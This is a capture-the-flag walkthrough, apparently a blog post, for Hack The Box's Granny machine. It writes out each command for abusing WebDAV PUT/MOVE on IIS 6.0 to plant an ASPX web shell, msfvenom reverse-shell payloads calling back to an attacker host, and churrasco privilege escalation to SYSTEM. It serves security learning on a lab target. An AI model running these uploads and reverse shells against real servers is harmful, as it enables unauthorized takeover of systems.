Granny – Hack The Box Walkthrough Without Metasploit

This is a walkthrough of the Granny box from Hack The Box, done without using Metasploit.

1. Reconnaissance 

I learned about this awesome all-in-one nmap script called nmapAutomator. I will use it to run all my scans:

./nmapAutomator.sh 10.10.10.15 All

  • All = runs all the scans consecutively
  • Note: This scan took about 30 minutes to run for me. But you will get some info right away, so you can use that while the rest of the scan is completing. In the case of this scan, the most helpful bit (the default creds) didn’t show up until about 25 min into the scan. Just something to keep in mind as you are trying to allocate your time accordingly.

Here are the results we get:

Things to note:

  • only port 80 was open, running Microsoft IIS httpd 6.0
  • webDAV is enabled
    • Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP
  • http methods PUT, MOVE, DELETE are possible (which means we can add, rename and remove files from this web server

 

2. Enumeration

Navigate to the web server in a browser:

Gobuster found some directories during the scan, but there is nothing in there.

We can test the http methods that the scan said were allowed. This is a Microsoft IIS web server, so it executes asp and aspx files. We can test to see if these file types are allowed to be uploaded by using the davtest tool that is built into Kali:

davtest --url http://10.10.10.15

According to the results, we can only execute html and txt files, but can upload executable files like cfmphppl, and jsp. Only being able to execute html and txt isn’t a problem, though, because the MOVE method is allowed (and this not only allows us to move a file, but to rename a file). We should be able to use MOVE to rename the txt file to an aspx file. Let’s do some testing:

First, create a file called test3.txt that contains the text “sup”

echo sup > test3.txt

Second, put the file onto the web server

curl -X PUT http://10.10.10.15/received.txt -d @test3.txt

  • -d @test3.txt = says that the data for the PUT request should be the contents from the test3.txt file
  • I named the file that will be saved to the web server “received.txt”

Third, curl the file to see if it contains “sup” (you can see it at the beginning of the fourth line)

curl http://10.10.10.15/received.txt

If you try to do the same PUT test with a file named received.aspx instead of .txt, you will see that it fails to PUT (just like davtest said).

Now use MOVE to rename the test .txt file to an .aspx

curl -X MOVE --header 'Destination: http://10.10.10.15/received.aspx' 'http://10.10.10.15/received.txt'

  • this will rename received.txt to received.aspx

curl http://10.10.10.15/received.aspx

  • this should spit out the contents of the file (which is still “sup”). Ignore my first test. You can see after the second test, that “sup” is there, at the beginning of the 4th line)

This test lets us know that MOVE works successfully and we can use it going forward in our attack.

 

3. Initial foothold

(METHOD 1)

1.Generate an aspx shell using msfvenom

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.2 LPORT=4444 -o shell.aspx

2. Then change the file from .aspx to .txt so you can upload it to the webserver

mv shell.aspx shell.txt

3. Then upload (PUT) the file onto the server

curl -X PUT http://10.10.10.15/shell.txt --data-binary @shell.txt

4. Then rename (MOVE) the file extension from .txt to .aspx

curl -X MOVE --header 'Destination:http://10.10.10.15/shell.aspx' 'http://10.10.10.15/shell.txt'

 

(METHOD 2)

1.Use the built in kali aspx web shell and copy it to your current working directory so you can use it

cp /usr/share/webshells/aspx/cmdasp.aspx .

  • the “.” copies it to your present working directory

2. PUT the file (giving it a .txt extension) onto the webserver

curl -X PUT http://10.10.10.15/shell.txt -d @cmdasp.aspx

  • -d @cmdasp.aspx = says that the data for the PUT request should be the contents from the cmdasp.aspx file

3. Rename (MOVE) the .txt back to .aspx

curl -X MOVE -H 'Destination:http://10.10.10.15/shell.aspx' http://10.10.10.15/shell.txt

 

By following method 1 or 2 above (either using msfvenom to generate a reverse shell, or using kali’s built in web shell), you should now have the reverse shell .aspx file uploaded to the webserver. Before executing it, open up a new terminal window and start a netcat listener:

nc -nlvp 4444

Then go to the web browser and type in 10.10.10.15/shell.aspx to execute. You should then see a shell sent back to our machine through the listener. Do a “whoami” and we can see that we are NOT root yet.

 

3. Privilege Escalation

Run whoami and whoami /priv to see what user we’re running as, and what privileges the box has enabled. We see we’re running as NETWORK SERVICE and have the critical SeImpersonatePrivilege privilege enabled (which says we can impersonate a client after authentication).

We also know that the victim box is running Windows Server 2003, and there is a well known exploit for SeImpersonatePrivilege on Server 2003 called churrasco. Let’s download it:

git clone https://github.com/Re4son/Churrasco.git

or since the file we need is churrasco.exe we can just do:

wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

The goal now is to get this file over to the webserver. Since we need permissions to actually execute the file once we get it on the server, we need to create a tmp directory on the victim box

cd C:\
mkdir temp
cd temp

Now back on your attack box, open a new terminal window and start up a file server so we can share our churrasco.exe with the victim box in the temp directory we created.

python /usr/share/doc/python3-impacket/examples/smbserver.py grannytemp /home/churr0s/Documents/HTB/granny/Churrasco/

  • this runs the smbserver from its location
  • grannytemp is a temp directory I’m creating to be the “share directory”
  • I am going to share all the contents in the ../granny/Churrasco/ directory on my box (Churrasco is what was downloaded from github and that directory contains the churrasco.exe file I want to share and execute on the victim box)

Now back on the victim box copy the churrasco.exe that is available to you now in the temporary shared directory I’ve set up with my file server:

copy \\10.10.14.2\grannytemp\churrasco.exe

  • you will see the file server in the screenshot above starts showing activity

Now that the file is copied over, let’s execute it:

churrasco.exe

After executing, we run another “whoami” and see we are now AUTHORITY\SYSTEM (root). However, after running one command to try to navigate back to the user directory, privilege was downgraded back to NETWORK SERVICE instead of AUTHORITY\SYSTEM. In order to get around this, we can make another msfvenom payload (this time as a .exe), send it to the victim box, and then ask the churrasco exploit to run the msfvenom payload as SYSTEM.

1.Create the new msfvenom payload:

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.2 lport=5555 -f exe -o revshell.exe

2. Open a new terminal window on your attack box and start a new listener over port 5555 to match your payload you just created

nc -nlvp 5555

3. Copy the payload over to our temp directory on the victim box using the same method we just used a minute ago. Make sure your file server is sharing whatever directory revshell.exe is in on your side.

4. The file is now copied over so let’s run our exploit again:

churrasco.exe -d "C:\temp\revshell.exe"

  • -d = specify the directory of the file we want to run along with the exploit

If successful, you should now have a reverse shell as AUTHORITY\SYSTEM!

Now grab the flags:

 

Leave a Reply

Your email address will not be published. Required fields are marked *